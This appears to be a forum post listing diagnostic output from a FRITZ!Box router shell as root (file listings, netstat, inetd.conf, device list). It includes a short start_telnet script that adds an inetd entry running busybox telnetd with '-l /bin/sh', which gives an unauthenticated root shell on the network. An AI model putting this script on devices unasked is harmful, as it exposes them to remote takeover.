-rwxrwxrwx    1 root     root           811 Jan 25  2017 moh_upload
lrwxrwxrwx    1 root     root            17 Jan 25  2017 nohup -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 nslookup -> ../../bin/busybox
-rwxrwxrwx    1 root     root           163 Jan 25  2017 nvi
lrwxrwxrwx    1 root     root            17 Jan 25  2017 passwd -> ../../bin/busybox
-rwxrwxrwx    1 root     root        105364 Jan 25  2017 pbd
-rwxrwxrwx    1 root     root          2094 Jan 25  2017 pbd_upload_image
-rwxrwxrwx    1 root     root          2743 Jan 25  2017 pbd_upload_ringtone
lrwxrwxrwx    1 root     root            17 Jan 25  2017 printf -> ../../bin/busybox
lrwxrwxrwx    1 root     root             3 Jan 25  2017 qcfg -> cli
lrwxrwxrwx    1 root     root             3 Jan 25  2017 qoscfg -> cli
-rwxrwxrwx    1 root     root        277900 Jan 25  2017 qosd
lrwxrwxrwx    1 root     root            17 Jan 25  2017 readlink -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 realpath -> ../../bin/busybox
-rwxrwxrwx    1 root     root          8144 Jan 25  2017 renice
lrwxrwxrwx    1 root     root            17 Jan 25  2017 reset -> ../../bin/busybox
-rwxrwxrwx    1 root     root           391 Jan 25  2017 resettam
-rwxrwxrwx    1 root     root        102260 Jan 25  2017 sadc
-rwxrwxrwx    1 root     root        218448 Jan 25  2017 sadf
-rwxrwxrwx    1 root     root        117984 Jan 25  2017 sar
lrwxrwxrwx    1 root     root            17 Jan 25  2017 seq -> ../../bin/busybox
-rwxrwxrwx    1 root     root          2160 Jan 25  2017 setcountry
-rwxrwxrwx    1 root     root           575 Jan 25  2017 setlanguage
-rwxrwxrwx    1 root     root          9868 Jan 25  2017 showportsopentolan
lrwxrwxrwx    1 root     root            17 Jan 25  2017 sort -> ../../bin/busybox
-rwxrwxrwx    1 root     root           944 Jan 25  2017 strace-log-merge
-rwxrwxrwx    1 root     root        268152 Jan 25  2017 switch_cli
-rwxrwxrwx    1 root     root          1139 Jan 25  2017 system_status
lrwxrwxrwx    1 root     root            17 Jan 25  2017 tail -> ../../bin/busybox
-rwxrwxrwx    1 root     root         19708 Jan 25  2017 tam_play
-rwxrwxrwx    1 root     root           752 Jan 25  2017 tam_upload_voice_prompt
lrwxrwxrwx    1 root     root            17 Jan 25  2017 taskset -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 tee -> ../../bin/busybox
-rwxrwxrwx    1 root     root        640056 Jan 25  2017 telefon
lrwxrwxrwx    1 root     root            17 Jan 25  2017 test -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 tftp -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 time -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 top -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 tr -> ../../bin/busybox
-rwxrwxrwx    1 root     root         25912 Jan 25  2017 tr069fwupdate
lrwxrwxrwx    1 root     root            17 Jan 25  2017 traceroute -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 tty -> ../../bin/busybox
-r-xr-xr-x    1 root     root         70696 Jan 25  2017 umtsd
lrwxrwxrwx    1 root     root            17 Jan 25  2017 uniq -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 unzip -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 uptime -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 wc -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 wget -> ../../bin/busybox
-rwxrwxrwx    1 root     root          2672 Jan 25  2017 wlan_lifetest.sh
lrwxrwxrwx    1 root     root            17 Jan 25  2017 xargs -> ../../bin/busybox

/usr/sbin:
Code:
drwxr-xr-x    2 root     root           442 Jan 25  2017 .
drwxr-xr-x   10 root     root           166 Jan 25  2017 ..
-rwxrwxrwx    1 root     root         78044 Jan 25  2017 blkid
lrwxrwxrwx    1 root     root            17 Jan 25  2017 brctl -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 chroot -> ../../bin/busybox
-rwxrwxrwx    1 root     root        383024 Jan 25  2017 dsl_control
-rwxrwxrwx    1 root     root          7012 Jan 25  2017 dsl_fw_sym_reader
-rwxrwxrwx    1 root     root          4620 Jan 25  2017 dsl_isp_tool
-rwxrwxrwx    1 root     root        163332 Jan 25  2017 dsl_monitor
-r-xr-xr-x    1 root     root           589 Jan 25  2017 dsl_pipe
-rwxrwxrwx    1 root     root         47889 Jan 25  2017 eth_oam
-rwxrwxrwx    1 root     root         32172 Jan 25  2017 flash_erase
lrwxrwxrwx    1 root     root            17 Jan 25  2017 inetd -> ../../bin/busybox
-rwxrwxrwx    1 root     root         39424 Jan 25  2017 nanddump
-rwxrwxrwx    1 root     root         57909 Jan 25  2017 oamd
-rwxrwxrwx    1 root     root         10188 Jan 25  2017 readchip
-rwxrwxrwx    1 root     root         22256 Jan 25  2017 ubiattach
-rwxrwxrwx    1 root     root         14676 Jan 25  2017 ubiblock
-rwxrwxrwx    1 root     root          6544 Jan 25  2017 ubicrc32
-rwxrwxrwx    1 root     root         16352 Jan 25  2017 ubidetach
-rwxrwxrwx    1 root     root         67572 Jan 25  2017 ubiformat
-rwxrwxrwx    1 root     root         25512 Jan 25  2017 ubimkvol
-rwxrwxrwx    1 root     root         28772 Jan 25  2017 ubinfo
-rwxrwxrwx    1 root     root         38812 Jan 25  2017 ubinize
-rwxrwxrwx    1 root     root         18068 Jan 25  2017 ubirename
-rwxrwxrwx    1 root     root         20000 Jan 25  2017 ubirmvol
-rwxrwxrwx    1 root     root         22184 Jan 25  2017 ubirsvol
-rwxrwxrwx    1 root     root         20128 Jan 25  2017 ubiupdatevol

netstat:
Code:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 127.0.0.1:1011          127.0.0.1:35569         FIN_WAIT2   
tcp        0      0 192.168.188.1:54707     192.168.188.20:54963    TIME_WAIT   
tcp        1      0 127.0.0.1:35569         127.0.0.1:1011          CLOSE_WAIT  
tcp        0      0 :::80                   :::*                    LISTEN      
tcp        0      0 :::51121                :::*                    LISTEN      
tcp        0      0 :::53                   :::*                    LISTEN      
tcp        0      0 :::8182                 :::*                    LISTEN      
tcp        0      0 :::8183                 :::*                    LISTEN      
tcp        0      0 :::8184                 :::*                    LISTEN      
tcp        0      0 :::8185                 :::*                    LISTEN      
tcp        0      0 :::8186                 :::*                    LISTEN      
tcp        0      0 :::443                  :::*                    LISTEN      
tcp        0      0 ::ffff:192.168.188.1:21 ::ffff:192.168.188.20:54961 FIN_WAIT2   
tcp        0      0 ::ffff:192.168.188.1:49443 ::ffff:192.168.188.20:54964 FIN_WAIT2   
udp        0      0 0.0.0.0:67              0.0.0.0:*                           
udp        0      0 192.168.188.1:1900      0.0.0.0:*                           
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           
udp        0      0 192.168.188.1:34559     0.0.0.0:*                           
udp        0      0 :::53                   :::*                                
udp        0      0 fe80::e228:6dff:fe9b:f78e:1900 :::*                                
udp        0      0 :::1900                 :::*                                
udp        0      0 :::60305                :::*                                
udp        0      0 fe80::e228:6dff:fe9b:f78e:47009 :::*                                
udp        0      0 :::52138                :::*                                
udp        0      0 :::5351                 :::*                                
udp        0      0 :::5353                 :::*                                
udp        0      0 :::5353                 :::*                                
udp        0      0 :::5355                 :::*                                
udp        0      0 :::5355                 :::*                                
udp        0      0 :::38903                :::*                                
udp        0      0 :::36347                :::*                                
raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ]         DGRAM                      5119 /var/tmp/wland_lbd_response
unix  2      [ ]         DGRAM                      5121 /var/tmp/wland_lbd_events
unix  2      [ ACC ]     SEQPACKET  LISTENING        262 /dev/.udev/control
unix  2      [ ]         DGRAM                      2328 /var/tmp/me_TR064.ctl
unix  2      [ ]         DGRAM                      2330 /var/tmp/me_tr064srv.ctl
unix  2      [ ACC ]     STREAM     LISTENING       5411 /var/tmp/wlancsi_listener_71977b11310399fc5374.socket
unix  2      [ ]         DGRAM                      3365 /var/tmp/me_dsld.ctl
unix  2      [ ]         DGRAM                      1873 /var/tmp/me_l2tpv3d.ctl
unix  2      [ ]         DGRAM                       856 /var/tmp/me_multid.ctl
unix  2      [ ]         DGRAM                       861 /var/tmp/me_upnpfboxdesc.ctl
unix  2      [ ]         DGRAM                      1893 /var/tmp/me_ctlmgr-pcp-1812.ctl
unix  2      [ ]         DGRAM                      2925 /var/run/hostapd/ath1
unix  2      [ ]         DGRAM                      1902 /var/tmp/me__anony1817-2007732072.ctl
unix  2      [ ]         DGRAM                      1904 /var/tmp/me_ctlmgr.ctl
unix  2      [ ]         DGRAM                      2161 /var/tmp/me_pcpd.ctl
unix  2      [ ]         DGRAM                      2164 /var/tmp/me_pcpd-pcp-1890.ctl
unix  2      [ ]         DGRAM                      4726 /var/run/hostapd/global
unix  2      [ ]         DGRAM                      1910 /var/tmp/me_dsl_remote_mgmt_kpi.ctl
unix  2      [ ]         DGRAM                      4732 /var/run/wpa_supplicant/global
unix  2      [ ACC ]     STREAM     LISTENING       3716 /var/rpc/timer_if
unix  2      [ ]         DGRAM                      2189 /var/tmp/me_upnp_usb.ctl
unix  2      [ ]         DGRAM                      2191 /var/tmp/me_kpi_name_receiver.ctl
unix  2      [ ]         DGRAM                      1936 /var/tmp/me_L2TPV3.ctl
unix  2      [ ACC ]     STREAM     LISTENING       4497 /var/tmp/boxnotify
unix  2      [ ]         DGRAM                      4499 /var/tmp/notifyd_msg
unix  2      [ ]         DGRAM                       925 /var/tmp/me_multid-pcp-1831.ctl
unix  2      [ ]         DGRAM                      3234 /var/tmp/me_upnpdevd.ctl
unix  2      [ ]         DGRAM                      2988 /var/run/hostapd/guest5
unix  3      [ ]         DGRAM                      2736 /var/tmp/wland_lbd_ctrl_socket
unix  3      [ ]         DGRAM                      2738 /var/tmp/lbd_requests
unix  2      [ ]         DGRAM                      4801 /var/run/hostapd/ath0
unix  2      [ ]         DGRAM                      3268 /var/tmp/me_libgsm.ctl
unix  2      [ ]         DGRAM                      2503 /var/tmp/me_igd.ctl
unix  2      [ ]         DGRAM                      2505 /var/tmp/me_igd2.ctl
unix  2      [ ]         DGRAM                      3275 /var/tmp/me_dsld-pcp-1906.ctl
unix  2      [ ]         DGRAM                       474 /var/tmp/me_remote.ctl
unix  2      [ ACC ]     STREAM     LISTENING       3548 /tmp/plc_sock_if
unix  2      [ ]         DGRAM                       476 /var/tmp/me_avmipc_state.ctl
unix  2      [ ACC ]     STREAM     LISTENING       3554 /var/tmp/wlancsi_async.socket
unix  2      [ ]         DGRAM                      2794 /var/run/hostapd/guest4
unix  2      [ ]         DGRAM                      3566 /var/tmp/me_logic.ctl
unix  3      [ ]         DGRAM                       270 
unix  2      [ ]         STREAM     CONNECTED       4187 
unix  3      [ ]         STREAM     CONNECTED       4613 /var/tmp/boxnotify
unix  3      [ ]         STREAM     CONNECTED       6228 
unix  3      [ ]         STREAM     CONNECTED       5410 
unix  2      [ ]         STREAM     CONNECTED       4186 
unix  3      [ ]         STREAM     CONNECTED       5516 /var/tmp/wlancsi_listener_71977b11310399fc5374.socket
unix  3      [ ]         STREAM     CONNECTED       4612 
unix  3      [ ]         STREAM     CONNECTED       4615 /var/tmp/boxnotify
unix  3      [ ]         STREAM     CONNECTED       3967 /var/rpc/timer_if
unix  3      [ ]         DGRAM                       269 
unix  3      [ ]         STREAM     CONNECTED       4614 
unix  3      [ ]         STREAM     CONNECTED       6227 /var/tmp/wlancsi_async.socket
unix  3      [ ]         STREAM     CONNECTED       3966

/var/tmp/inetd.conf:
Code:
21 stream tcp6 nowait.30 root /bin/sh sh /bin/inetdftp
139 stream tcp6 nowait root /sbin/smbd smbd
445 stream tcp6 nowait root /sbin/smbd smbd

/var/start_telnet:
Code:
umount /usr/sbin 2>/dev/null
rm -r /var/usrsbin 2>/dev/null
cp -a /usr/sbin /var/usrsbin
mount /var/usrsbin /usr/sbin -o bind
ln -s ../../bin/busybox /usr/sbin/telnetd
sed -e '/^23 /d' -e '$a23 stream tcp6 nowait root /bin/busybox telnetd -l /bin/sh -i -K' /var/tmp/inetd.conf >/var/tmp/inetd.conf.new && mv /var/tmp/inetd.conf.new /var/tmp/inetd.conf && kill -HUP $(pidof inetd)
echo "Telnet support initialized"

id:
Code:
uid=0(root) gid=0(root)

/proc/devices:
Code:
Character devices:
  1 mem
  5 /dev/tty
  5 /dev/console
  5 /dev/ptmx
 10 misc
 68 capi_oslib
 81 switch_api
 89 i2c
 90 mtd
108 ppp
128 ptm
136 pts
180 usb
181 ppa
189 usb_device
230 spdmon
232 wlan_eeprom
233 userman_url
234 kdsldptrace
235 kdsld_misc
236 kdsld_traffic
237 kdsld_user
238 kdsld
241 dect_io
242 sysrst
243 led
244 ubi0
245 tffs
246 ltq_icc
247 ltq_mps2
248 debug
249 avm_event
250 watchdog
251 avm_power
252 avm_net_trace
253 ttyLTQ
254 rtc


Block devices:
259 blkext
  7 loop
  8 sd
 31 mtdblock
 65 sd
 66 sd
 67 sd
 68 sd
 69 sd
 70 sd
 71 sd
128 sd
129 sd
130 sd
131 sd
132 sd
133 sd
134 sd
135 sd
254 zram

sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices:
Code:
245
 
Holen Sie sich 3CX - völlig kostenlos!
Verbinden Sie Ihr Team und Ihre Kunden Telefonie Livechat Videokonferenzen

Gehostet oder selbst-verwaltet. Für bis zu 10 Nutzer dauerhaft kostenlos. Keine Kreditkartendetails erforderlich. Ohne Risiko testen.

3CX
Für diese E-Mail-Adresse besteht bereits ein 3CX-Konto. Sie werden zum Kundenportal weitergeleitet, wo Sie sich anmelden oder Ihr Passwort zurücksetzen können, falls Sie dieses vergessen haben.